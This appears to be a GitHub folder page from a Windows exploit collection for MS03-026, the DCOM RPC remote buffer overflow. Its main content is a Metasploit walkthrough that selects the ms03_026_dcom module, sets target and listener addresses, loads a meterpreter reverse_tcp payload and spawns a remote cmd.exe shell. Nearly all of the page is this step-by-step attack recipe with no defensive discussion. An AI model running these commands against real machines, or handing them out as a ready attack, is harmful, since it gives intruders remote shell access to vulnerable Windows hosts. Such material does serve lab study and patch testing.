Skip to content

Latest commit

 

History

History

MS03-026

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 

MS03-026

MS03-026

Vulnerability reference:

msf Usage

msf > search ms03_026
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST 192.168.229.129
msf exploit(ms03_026_dcom) > set LHOST 192.168.229.35
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > exploit

meterpreter > execute -f cmd.exe -c -1

References

Microsoft Windows DCOM RPC接口长主机名远程缓冲区溢出漏洞